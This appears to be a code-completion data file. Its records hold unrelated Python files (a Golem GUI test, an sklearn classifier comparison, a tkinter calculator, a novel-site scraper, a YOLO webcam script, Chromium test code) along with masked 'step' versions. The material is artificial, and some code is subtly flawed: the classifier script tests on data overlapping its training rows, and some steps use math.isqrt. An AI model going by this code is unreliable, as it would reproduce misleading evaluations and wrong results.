"step-3": "<mask token>\ndescription = 'Verify the user can edit test code and save it'\ntags = ['smoke']\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\ndef test(data):\n test_line = \"description = 'desc'\"\n test_builder_code.set_value(test_line)\n actions.click(test_builder_code.save_button)\n common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')\n actions.refresh_page()\n test_builder_code.assert_value(test_line)\n",
"step-4": "from golem import actions\nfrom projects.golem_gui.pages import common\nfrom projects.golem_gui.pages import api\nfrom projects.golem_gui.pages import test_builder_code\ndescription = 'Verify the user can edit test code and save it'\ntags = ['smoke']\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\ndef test(data):\n test_line = \"description = 'desc'\"\n test_builder_code.set_value(test_line)\n actions.click(test_builder_code.save_button)\n common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')\n actions.refresh_page()\n test_builder_code.assert_value(test_line)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
from sklearn import svm, metrics, tree
from sklearn.ensemble import AdaBoostClassifier
from sklearn.neighbors import KNeighborsClassifier
import numpy as np
my_data = np.loadtxt('edited_data/dataset_regression_edited.csv',delimiter=',', dtype='str')
training_data = my_data[:, 0:6]
validation_data = my_data[:, 6]
classifiers = [
tree.DecisionTreeClassifier(max_depth=5),
tree.DecisionTreeClassifier(max_depth=8),
tree.DecisionTreeClassifier(max_depth=10),
svm.SVC(kernel='linear'),
svm.SVC(kernel='rbf'),
AdaBoostClassifier(n_estimators=50),
AdaBoostClassifier(n_estimators=100),
KNeighborsClassifier(3),
KNeighborsClassifier(5),
KNeighborsClassifier(7)
]
for classifier in classifiers:
classifier.fit(training_data[:1500], validation_data[:1500])
expected = validation_data[681:]
predicted = classifier.predict(training_data[681:])
print("Classification report for classifier %s:\n%s\n"
% (classifier, metrics.classification_report(expected, predicted)))
print("Confusion matrix:\n%s" % metrics.confusion_matrix(expected, predicted))
|
normal
|
{
"blob_id": "3024359710148bfbb15677973555f214b1f878b7",
"index": 1521,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print('Classification report for classifier %s:\\n%s\\n' % (classifier,\n metrics.classification_report(expected, predicted)))\n print('Confusion matrix:\\n%s' % metrics.confusion_matrix(expected,\n predicted))\n",
"step-3": "<mask token>\nmy_data = np.loadtxt('edited_data/dataset_regression_edited.csv', delimiter\n =',', dtype='str')\ntraining_data = my_data[:, 0:6]\nvalidation_data = my_data[:, 6]\nclassifiers = [tree.DecisionTreeClassifier(max_depth=5), tree.\n DecisionTreeClassifier(max_depth=8), tree.DecisionTreeClassifier(\n max_depth=10), svm.SVC(kernel='linear'), svm.SVC(kernel='rbf'),\n AdaBoostClassifier(n_estimators=50), AdaBoostClassifier(n_estimators=\n 100), KNeighborsClassifier(3), KNeighborsClassifier(5),\n KNeighborsClassifier(7)]\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print('Classification report for classifier %s:\\n%s\\n' % (classifier,\n metrics.classification_report(expected, predicted)))\n print('Confusion matrix:\\n%s' % metrics.confusion_matrix(expected,\n predicted))\n",
"step-4": "from sklearn import svm, metrics, tree\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np\nmy_data = np.loadtxt('edited_data/dataset_regression_edited.csv', delimiter\n =',', dtype='str')\ntraining_data = my_data[:, 0:6]\nvalidation_data = my_data[:, 6]\nclassifiers = [tree.DecisionTreeClassifier(max_depth=5), tree.\n DecisionTreeClassifier(max_depth=8), tree.DecisionTreeClassifier(\n max_depth=10), svm.SVC(kernel='linear'), svm.SVC(kernel='rbf'),\n AdaBoostClassifier(n_estimators=50), AdaBoostClassifier(n_estimators=\n 100), KNeighborsClassifier(3), KNeighborsClassifier(5),\n KNeighborsClassifier(7)]\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print('Classification report for classifier %s:\\n%s\\n' % (classifier,\n metrics.classification_report(expected, predicted)))\n print('Confusion matrix:\\n%s' % metrics.confusion_matrix(expected,\n predicted))\n",
"step-5": "from sklearn import svm, metrics, tree\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np\n\n\nmy_data = np.loadtxt('edited_data/dataset_regression_edited.csv',delimiter=',', dtype='str')\n\ntraining_data = my_data[:, 0:6]\nvalidation_data = my_data[:, 6]\n\n\nclassifiers = [\n tree.DecisionTreeClassifier(max_depth=5),\n tree.DecisionTreeClassifier(max_depth=8),\n tree.DecisionTreeClassifier(max_depth=10),\n svm.SVC(kernel='linear'),\n svm.SVC(kernel='rbf'),\n AdaBoostClassifier(n_estimators=50),\n AdaBoostClassifier(n_estimators=100),\n KNeighborsClassifier(3),\n KNeighborsClassifier(5),\n KNeighborsClassifier(7)\n]\n\n\nfor classifier in classifiers:\n classifier.fit(training_data[:1500], validation_data[:1500])\n expected = validation_data[681:]\n predicted = classifier.predict(training_data[681:])\n print(\"Classification report for classifier %s:\\n%s\\n\"\n % (classifier, metrics.classification_report(expected, predicted)))\n print(\"Confusion matrix:\\n%s\" % metrics.confusion_matrix(expected, predicted))\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#GUIcal.py
from tkinter import *
from tkinter import ttk
import math
GUI=Tk()
GUI.title('My Cal Program')
GUI.geometry('500x500')
def calc():
	height=v_height.get()
	base=v_base.get()  # get the value from v_base
	print(f'height is {height}')
	print(f'Basal length is {base}')
	length= math.sqrt((height*height)+(base*base))
	print('Length is {:.2f}'.format(length))
	v_result.set('Length is {:.2f}'.format(length))
###For attach picture
'''
IMG=PhotoImage(file='pythagorus-theorem.png').subsample(3)
IM1=Label(GUI,image=IMG)
IM1.pack()
'''
v_height=IntVar()
v_base=IntVar()
L1=Label(text='Please input height',foreground='red',font=('Angsana New',15))
L1.pack()
E1=ttk.Entry(GUI,textvariable=v_height)
E1.pack(pady=8,ipady=7,ipadx=17)
L2=Label(text='Please input basal length',foreground='red',font=('Angsana New',15))
L2.pack()
E2=ttk.Entry(GUI,textvariable=v_base)
E2.pack(pady=8,ipady=7,ipadx=17)
B1=ttk.Button(text='Calculate',command=calc)
B1.pack()
v_result=StringVar()
v_result.set('----Result----')
Result=ttk.Label(GUI,textvariable=v_result,foreground='green',font=('Angsana New',15))
Result.pack()
GUI.mainloop()
|
normal
|
{
"blob_id": "77d7fb49ed4c3e78b148cd446e9a5c6a0e6fac8b",
"index": 835,
"step-1": "<mask token>\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\n",
"step-2": "<mask token>\nGUI.title('My Cal Program')\nGUI.geometry('500x500')\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\nL1.pack()\n<mask token>\nE1.pack(pady=8, ipady=7, ipadx=17)\n<mask token>\nL2.pack()\n<mask token>\nE2.pack(pady=8, ipady=7, ipadx=17)\n<mask token>\nB1.pack()\n<mask token>\nv_result.set('----Result----')\n<mask token>\nResult.pack()\nGUI.mainloop()\n",
"step-3": "<mask token>\nGUI = Tk()\nGUI.title('My Cal Program')\nGUI.geometry('500x500')\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\nv_height = IntVar()\nv_base = IntVar()\nL1 = Label(text='Please input height', foreground='red', font=(\n 'Angsana New', 15))\nL1.pack()\nE1 = ttk.Entry(GUI, textvariable=v_height)\nE1.pack(pady=8, ipady=7, ipadx=17)\nL2 = Label(text='Please input basal length', foreground='red', font=(\n 'Angsana New', 15))\nL2.pack()\nE2 = ttk.Entry(GUI, textvariable=v_base)\nE2.pack(pady=8, ipady=7, ipadx=17)\nB1 = ttk.Button(text='Calculate', command=calc)\nB1.pack()\nv_result = StringVar()\nv_result.set('----Result----')\nResult = ttk.Label(GUI, textvariable=v_result, foreground='green', font=(\n 'Angsana New', 15))\nResult.pack()\nGUI.mainloop()\n",
"step-4": "from tkinter import *\nfrom tkinter import ttk\nimport math\nGUI = Tk()\nGUI.title('My Cal Program')\nGUI.geometry('500x500')\n\n\ndef calc():\n height = v_height.get()\n base = v_base.get()\n print(f'height is {height}')\n print(f'Basal length is {base}')\n length = math.isqrt(height * height + base * base)\n print('Lenght is {:.2f}'.format(length))\n\n\n<mask token>\nv_height = IntVar()\nv_base = IntVar()\nL1 = Label(text='Please input height', foreground='red', font=(\n 'Angsana New', 15))\nL1.pack()\nE1 = ttk.Entry(GUI, textvariable=v_height)\nE1.pack(pady=8, ipady=7, ipadx=17)\nL2 = Label(text='Please input basal length', foreground='red', font=(\n 'Angsana New', 15))\nL2.pack()\nE2 = ttk.Entry(GUI, textvariable=v_base)\nE2.pack(pady=8, ipady=7, ipadx=17)\nB1 = ttk.Button(text='Calculate', command=calc)\nB1.pack()\nv_result = StringVar()\nv_result.set('----Result----')\nResult = ttk.Label(GUI, textvariable=v_result, foreground='green', font=(\n 'Angsana New', 15))\nResult.pack()\nGUI.mainloop()\n",
"step-5": "#GUIcal.py\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport math\r\n\r\nGUI=Tk()\r\nGUI.title('My Cal Program')\r\nGUI.geometry('500x500')\r\n\r\ndef calc():\r\n\theight=v_height.get()\r\n\tbase=v_base.get()#ดึงค่ามาจากv_base\r\n\tprint(f'height is {height}')\r\n\tprint(f'Basal length is {base}')\r\n\tlength= math.isqrt((height*height)+(base*base))\r\n\tprint('Lenght is {:.2f}'.format(length))\r\n\t\r\n###For attach picture\r\n'''\r\nIMG=PhotoImage(file='pythagorus-theorem.png').subsample(3)\r\nIM1=Label(GUI,image=IMG)\r\nIM1.pack()\r\n'''\r\nv_height=IntVar()\r\nv_base=IntVar()\r\n\r\nL1=Label(text='Please input height',foreground='red',font=('Angsana New',15))\r\nL1.pack()\r\nE1=ttk.Entry(GUI,textvariable=v_height)\r\nE1.pack(pady=8,ipady=7,ipadx=17)\r\n\r\n\r\nL2=Label(text='Please input basal length',foreground='red',font=('Angsana New',15))\r\nL2.pack()\r\nE2=ttk.Entry(GUI,textvariable=v_base)\r\nE2.pack(pady=8,ipady=7,ipadx=17)\r\n\r\n\r\nB1=ttk.Button(text='Calculate',command=calc)\r\nB1.pack()\r\n\r\nv_result=StringVar()\r\nv_result.set('----Result----')\r\nResult=ttk.Label(GUI,textvariable=v_result,foreground='green',font=('Angsana New',15))\r\nResult.pack()\r\n\r\nGUI.mainloop()\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding:utf-8 -*-
import requests
from lxml import etree
import codecs
from transfrom import del_extra
import re
MODIFIED_TEXT = [r'一秒记住.*?。', r'(看书.*?)', r'纯文字.*?问', r'热门.*?>', r'最新章节.*?新',
r'は防§.*?e', r'&.*?>', r'r.*?>', r'c.*?>',
r'复制.*?>', r'字-符.*?>', r'最新最快,无.*?。',
r' .Shumilou.Co M.Shumilou.Co<br /><br />', r'[Ww]{3}.*[mM]',
r'&nbsp; &nbsp; &nbsp; &nbsp; ']
HEADER = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '}
URL = 'http://www.xxbiquge.com/5_5422/'
def crawl_urls(u):
response = requests.get(u, headers=HEADER)
body = etree.HTML(response.content)
content_urls = body.xpath('//div[@class="box_con"]/div/dl//dd/a/@href')
for pk_id, u in enumerate(content_urls):
content_url = 'http://www.xxbiquge.com' + u
yield pk_id, content_url
def crwal(content_url):
""" 爬出目标网站的目标文章,并过滤文章"""
content_response = requests.get(content_url, headers=HEADER)
content_body = etree.HTML(content_response.content)
try:
chapter = content_body.xpath('//div[@class="bookname"]/h1/text()')[0]
content = content_body.xpath('//div[@id="content"]')[0]
except IndexError:
raise IndexError('rules haved change in %s' % content_url)
final_content, need_confirm = transform_content(etree.tounicode(content))
final_content = content_filter(final_content)
return chapter, final_content, need_confirm
def transform_content(txt):
need_confirm = 0
if 'div' in txt:
txt = txt.split('<div id="content">')[-1].split('</div>')[0]
if len(txt) > 0:
while True:
if txt.startswith(' ') or txt.startswith(' '):
break
if '\u4e00' <= txt[0] <= '\u9fff':
break
txt = txt[1:]
txt = del_extra(txt)
if '\\' in txt or len(txt) < 100:
need_confirm = 1
return txt, need_confirm
def content_filter(content):
""" 正则去除文章中间的广告,乱码"""
m_content = content
for ccc in MODIFIED_TEXT:
m_content = re.sub(ccc, '', m_content)
return m_content
if __name__ == '__main__':
pass
|
normal
|
{
"blob_id": "7539042b92a5188a11f625cdfc0f341941f751f0",
"index": 6937,
"step-1": "<mask token>\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\nif __name__ == '__main__':\n pass\n",
"step-3": "<mask token>\nMODIFIED_TEXT = ['一秒记住.*?。', '(看书.*?)', '纯文字.*?问', '热门.*?>', '最新章节.*?新',\n 'は防§.*?e', '&.*?>', 'r.*?>', 'c.*?>', '复制.*?>', '字-符.*?>', '最新最快,无.*?。',\n '\\xa0\\xa0\\xa0\\xa0.Shumilou.Co\\xa0\\xa0M.Shumilou.Co<br /><br />',\n '[Ww]{3}.*[mM]',\n '&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0'\n ]\nHEADER = {'user-agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '\n }\nURL = 'http://www.xxbiquge.com/5_5422/'\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "import requests\nfrom lxml import etree\nimport codecs\nfrom transfrom import del_extra\nimport re\nMODIFIED_TEXT = ['一秒记住.*?。', '(看书.*?)', '纯文字.*?问', '热门.*?>', '最新章节.*?新',\n 'は防§.*?e', '&.*?>', 'r.*?>', 'c.*?>', '复制.*?>', '字-符.*?>', '最新最快,无.*?。',\n '\\xa0\\xa0\\xa0\\xa0.Shumilou.Co\\xa0\\xa0M.Shumilou.Co<br /><br />',\n '[Ww]{3}.*[mM]',\n '&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0\\xa0\\xa0&nbsp;\\xa0\\xa0'\n ]\nHEADER = {'user-agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '\n }\nURL = 'http://www.xxbiquge.com/5_5422/'\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith('\\xa0') or txt.startswith('\\u3000'):\n break\n if '一' <= txt[0] <= '鿿':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\n\nif __name__ == '__main__':\n pass\n",
"step-5": "# -*- coding:utf-8 -*-\n\nimport requests\nfrom lxml import etree\nimport codecs\nfrom transfrom import del_extra\nimport re\n\nMODIFIED_TEXT = [r'一秒记住.*?。', r'(看书.*?)', r'纯文字.*?问', r'热门.*?>', r'最新章节.*?新',\n r'は防§.*?e', r'&.*?>', r'r.*?>', r'c.*?>',\n r'复制.*?>', r'字-符.*?>', r'最新最快,无.*?。',\n r' .Shumilou.Co M.Shumilou.Co<br /><br />', r'[Ww]{3}.*[mM]',\n r'&nbsp; &nbsp; &nbsp; &nbsp; ']\n\nHEADER = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 '}\nURL = 'http://www.xxbiquge.com/5_5422/'\n\n\ndef crawl_urls(u):\n response = requests.get(u, headers=HEADER)\n body = etree.HTML(response.content)\n content_urls = body.xpath('//div[@class=\"box_con\"]/div/dl//dd/a/@href')\n for pk_id, u in enumerate(content_urls):\n content_url = 'http://www.xxbiquge.com' + u\n yield pk_id, content_url\n\n\ndef crwal(content_url):\n \"\"\" 爬出目标网站的目标文章,并过滤文章\"\"\"\n content_response = requests.get(content_url, headers=HEADER)\n content_body = etree.HTML(content_response.content)\n try:\n chapter = content_body.xpath('//div[@class=\"bookname\"]/h1/text()')[0]\n content = content_body.xpath('//div[@id=\"content\"]')[0]\n except IndexError:\n raise IndexError('rules haved change in %s' % content_url)\n final_content, need_confirm = transform_content(etree.tounicode(content))\n final_content = content_filter(final_content)\n return chapter, final_content, need_confirm\n\n\ndef transform_content(txt):\n need_confirm = 0\n if 'div' in txt:\n txt = txt.split('<div id=\"content\">')[-1].split('</div>')[0]\n if len(txt) > 0:\n while True:\n if txt.startswith(' ') or txt.startswith(' '):\n break\n if '\\u4e00' <= txt[0] <= '\\u9fff':\n break\n txt = txt[1:]\n txt = del_extra(txt)\n if '\\\\' in txt or len(txt) < 100:\n need_confirm = 1\n return txt, need_confirm\n\n\ndef content_filter(content):\n \"\"\" 正则去除文章中间的广告,乱码\"\"\"\n m_content = content\n for ccc in MODIFIED_TEXT:\n m_content = re.sub(ccc, '', m_content)\n return m_content\n\nif __name__ == '__main__':\n pass\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from yoloPydarknet import pydarknetYOLO
import cv2
import imutils
import time
yolo = pydarknetYOLO(obdata="../darknet/cfg/coco.data", weights="yolov3.weights",
cfg="../darknet/cfg/yolov3.cfg")
video_out = "yolo_output.avi"
start_time = time.time()
if __name__ == "__main__":
VIDEO_IN = cv2.VideoCapture(0)
if(video_out!=""):
width = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_WIDTH)) # float
height = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_HEIGHT)) # float
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
out = cv2.VideoWriter(video_out,fourcc, 30.0, (int(width),int(height)))
frameID = 0
while True:
hasFrame, frame = VIDEO_IN.read()
# Stop the program if reached end of video
if not hasFrame:
print("Done processing !!!")
print("--- %s seconds ---" % (time.time() - start_time))
break
yolo.getObject(frame, labelWant="", drawBox=True, bold=1, textsize=0.6, bcolor=(0,0,255), tcolor=(255,255,255))
print ("Object counts:", yolo.objCounts)
cv2.imshow("Frame", imutils.resize(frame, width=850))
if(video_out!=""):
out.write(frame)
k = cv2.waitKey(1)
if k == 0xFF & ord("q"):
out.release()
break
|
normal
|
{
"blob_id": "669eb2e898c3a127ae01e0ee3020a3674e5e340d",
"index": 1091,
"step-1": "from yoloPydarknet import pydarknetYOLO\nimport cv2\nimport imutils\nimport time\n\nyolo = pydarknetYOLO(obdata=\"../darknet/cfg/coco.data\", weights=\"yolov3.weights\", \n cfg=\"../darknet/cfg/yolov3.cfg\")\nvideo_out = \"yolo_output.avi\"\n\nstart_time = time.time()\n\nif __name__ == \"__main__\":\n\n VIDEO_IN = cv2.VideoCapture(0)\n if(video_out!=\"\"):\n width = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_WIDTH)) # float\n height = int(VIDEO_IN.get(cv2.CAP_PROP_FRAME_HEIGHT)) # float\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n out = cv2.VideoWriter(video_out,fourcc, 30.0, (int(width),int(height)))\n\n frameID = 0\n while True:\n hasFrame, frame = VIDEO_IN.read()\n # Stop the program if reached end of video\n if not hasFrame:\n print(\"Done processing !!!\")\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n\n yolo.getObject(frame, labelWant=\"\", drawBox=True, bold=1, textsize=0.6, bcolor=(0,0,255), tcolor=(255,255,255))\n print (\"Object counts:\", yolo.objCounts)\n cv2.imshow(\"Frame\", imutils.resize(frame, width=850))\n if(video_out!=\"\"):\n out.write(frame)\n\n k = cv2.waitKey(1)\n if k == 0xFF & ord(\"q\"):\n out.release()\n break\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import logging
import mock
from parameterized import parameterized
from buildbucket_proto import common_pb2
from buildbucket_proto.build_pb2 import Build
from buildbucket_proto.step_pb2 import Step
from common.waterfall import buildbucket_client
from infra_api_clients import logdog_util
from libs.test_results.gtest_test_results import GtestTestResults
from libs.test_results.webkit_layout_test_results import WebkitLayoutTestResults
from model.isolated_target import IsolatedTarget
from model.wf_build import WfBuild
from services import step_util
from services import swarming
from waterfall import build_util
from waterfall import waterfall_config
from waterfall.build_info import BuildInfo
from waterfall.test import wf_testcase
class MockWaterfallBuild(object):
def __init__(self):
self.build_id = None
self.log_location = 'logdog://logs.chromium.org/chromium/buildbucket/path'
def _MockedGetBuildInfo(master_name, builder_name, build_number):
build = BuildInfo(master_name, builder_name, build_number)
build.commit_position = (build_number + 1) * 10
build.result = (
common_pb2.SUCCESS if build_number > 4 else common_pb2.INFRA_FAILURE)
return build
class StepUtilTest(wf_testcase.WaterfallTestCase):
def testGetLowerBoundBuildNumber(self):
self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))
self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100, 200))
self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600, 500))
def testGetBoundingIsolatedTargets(self):
lower_bound_commit_position = 1000
upper_bound_commit_position = 1010
requested_commit_position = 1005
build_id = 10000
target_name = 'browser_tests'
master_name = 'm'
builder_name = 'b'
luci_name = 'chromium'
bucket_name = 'ci'
gitiles_host = 'chromium.googlesource.com'
gitiles_project = 'chromium/src'
gitiles_ref = 'refs/heads/master'
gerrit_patch = ''
lower_bound_revision = 'r1000'
upper_bound_revision = 'r1010'
lower_bound_target = IsolatedTarget.Create(
build_id - 1, luci_name, bucket_name, master_name, builder_name,
gitiles_host, gitiles_project, gitiles_ref, gerrit_patch, target_name,
'hash_1', lower_bound_commit_position, lower_bound_revision)
lower_bound_target.put()
upper_bound_target = IsolatedTarget.Create(
build_id, luci_name, bucket_name, master_name, builder_name,
gitiles_host, gitiles_project, gitiles_ref, gerrit_patch, target_name,
'hash_2', upper_bound_commit_position, upper_bound_revision)
upper_bound_target.put()
self.assertEqual((lower_bound_target, upper_bound_target),
step_util.GetBoundingIsolatedTargets(
master_name, builder_name, target_name,
requested_commit_position))
@mock.patch.object(build_util, 'GetBuildInfo')
def testGetValidBuildSearchAscendingWithinRange(self, mocked_get_build_info):
master_name = 'm'
builder_name = 'b'
step_name = 's'
invalid_build_100 = BuildInfo(master_name, builder_name, 100)
invalid_build_101 = BuildInfo(master_name, builder_name, 101)
valid_build_102 = BuildInfo(master_name, builder_name, 102)
valid_build_102.commit_position = 1020
mocked_get_build_info.side_effect = [
invalid_build_100,
invalid_build_101,
valid_build_102,
]
self.assertEqual(
valid_build_102,
step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,
2))
@mock.patch.object(build_util, 'GetBuildInfo')
def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info):
master_name = 'm'
builder_name = 'b'
step_name = 's'
invalid_build_100 = BuildInfo(master_name, builder_name, 100)
invalid_build_101 = BuildInfo(master_name, builder_name, 101)
valid_build_102 = BuildInfo(master_name, builder_name, 102)
valid_build_102.commit_position = 1020
mocked_get_build_info.side_effect = [
invalid_build_100,
invalid_build_101,
valid_build_102,
]
self.assertIsNone(
step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,
1))
@mock.patch.object(build_util, 'GetBuildInfo')
def testGetValidBuildSearchDescending(self, mocked_get_build_info):
master_name = 'm'
builder_name = 'b'
step_name = 's'
